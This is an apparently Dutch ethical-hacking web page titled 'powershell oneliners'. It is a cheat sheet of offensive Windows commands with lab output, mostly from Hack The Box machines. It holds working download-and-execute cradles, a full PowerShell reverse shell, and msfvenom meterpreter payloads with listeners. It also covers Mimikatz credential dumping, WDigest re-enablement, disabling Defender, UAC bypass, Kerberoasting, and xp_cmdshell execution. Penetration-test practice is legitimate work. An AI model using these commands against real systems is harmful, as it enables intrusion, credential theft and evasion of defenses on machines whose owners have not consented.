puckiestyle – ethical hacking
For info or a quote, mail us at info@puckiestyle.nl or use the contact form
whoami : Network / System Engineer , Security specialist from Meppel (NL)
powershell oneliners
PowerShell (any version):
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat’,’launcher.bat'); Start-Process ‘launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')
C:\Users\hillie>cmdkey /list Currently stored credentials: Target: Domain:interactive=HTB\Administrator Type: Domain Password User: HTB\Administrator
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG) CertUtil: ASN1 bad tag value met. PS C:\pentest> dir *.bin Directory: C:\pentest Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/7/2019 4:16 PM 5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml PS C:\pentest> dir *.xml Directory: C:\pentest Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/7/2019 4:16 PM 5462 msbuild_nps.xml
C:\Users\Public> runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA Windows PowerShell running as user Administrator on HTB Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>whoami HTB\administrator
root@kali:~/htb/access# echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0 SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public> runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd
Full documentation here.
PowerShell 4.0 & 5.0:
PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>
xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"
Full documentation here.
c:\inetpub\wwwroot\internal-01\log>powershell powershell Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. Cannot load PSReadline module. Console is running without PSReadline. PS C:\inetpub\wwwroot\internal-01\log> $username = 'BART\h.potter' PS C:\inetpub\wwwroot\internal-01\log> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1' PS C:\inetpub\wwwroot\internal-01\log> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword PS C:\inetpub\wwwroot\internal-01\log> Enter-PSSession -ComputerName localhost -Credential $credential [localhost]: PS C:\Users\h.potter\Documents> whoami bart\h.potter [localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitOperatingSystem True [localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitProcess True
PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1') Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S ample-Exploits/MS16-135 VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://www.puckiestyle.nl/ps/powerup.ps1‘);Invoke-AllChecks" PS C:\Users\hillie>(new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1') PS C:\users\mssql-svc\appdata\local\temp> import-module ./powerup.ps1 [*] Running Invoke-AllChecks PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz" PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress" PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')" PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')" Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444 PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator
C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe
wmic /NODE:”DC01″ /USER:”puckiestyle\administrator” OS GET Name
wmic /node:192.168.23.214 NIC get description,macaddress
wmic /USER:”puckiestyle\puck” /PASSWORD:”p@ssw0rd” /NODE:192.168.178.200 process call create “powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.50/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt”
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rundll32.exe user32.dll,LockWorkStation
root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe root@kali# msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"
PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true
change claire password to Password! Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire Login as Claire and Grant Tom access to Backup_Admins Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom
Want to add a brand new executable extension (also callable from a .bat)?
C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck
Want to know Applocker status from a cmd shell?
powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"
Set TrustedHosts with PowerShell (as Admin)
Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"
And check (don’t need Admin for that)
Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public\powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')
root@kali:~/htb/optimum# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 53 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::53 Ncat: Listening on 0.0.0.0:53 Ncat: Connection from 10.10.10.8. Ncat: Connection from 10.10.10.8:49541. Windows PowerShell running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitOperatingSystem True PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitProcess True
PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1") PS C:\users\public> import-module ./Invoke-MS16135.ps1 PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')" _____ _____ ___ ___ ___ ___ ___ | | __|_ | | _|___|_ | |_ | _| | | | |__ |_| |_| . |___|_| |_|_ |_ | |_|_|_|_____|_____|___| |_____|___|___| [by b33f -> @FuzzySec] [!] Success, spawning a system shell!
root@kali:~/htb# nc -lvp 53 listening on [any] 53 ... 192.168.178.11: inverse host lookup failed: Unknown host connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238 Windows PowerShell running as user hillie on HILLIE Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\users\public>whoami nt authority\system PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:
# Enable Remote Desktop (Get-WmiObject Win32_TerminalServiceSetting -Namespace root\cimv2\TerminalServices).SetAllowTsConnections(1,1) | Out-Null (Get-WmiObject -Class "Win32_TSGeneralSetting" -Namespace root\cimv2\TerminalServices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) | Out-Null Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled true
Execute aboves cmdlets as Administrator in Powershell, and RDP should work.
To test the connection, open Powershell on another machine, and run:
PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp ComputerName : 10.10.10.97 RemoteAddress : 10.10.10.97 RemotePort : 3389 InterfaceAlias : Ethernet 2 SourceAddress : 10.10.14.12 TcpTestSucceeded : True PS C:\Users\jacco>
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt")) ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr PS C:\Users\jacco>
PS C:\pentest> [IO.File]::WriteAllBytes( "c:\pentest\new.txt" ,[Convert]::FromBase64String( "ZGl0IGJlc3RhbmQgaXMgZ2VoZWl tDQpncm9ldGplcyBQdWNr")) PS C:\pentest> type new.txt dit bestand is geheim groetjes Puck
# Description: # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" # Invoke-Mimikatz: Dump credentials from memory powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" # Import Mimikatz Module to run further commands powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" # PowerUp: Privilege escalation checks powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” # Invoke-Inveigh and log output to file powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y" # Invoke-Kerberoast and provide Hashcat compatible hashes powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat" # Invoke-ShareFinder and print output to file powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" # Import PowerView Module to run further commands powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" # Invoke-Bloodhound powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" # Find GPP Passwords in SYSVOL findstr /S cpassword $env:logonserver\sysvol\*.xml findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe) # Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER] runas /user:DOMAIN\USER /noprofile powershell.exe # Insert reg key to enable Wdigest on newer versions of Windows reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1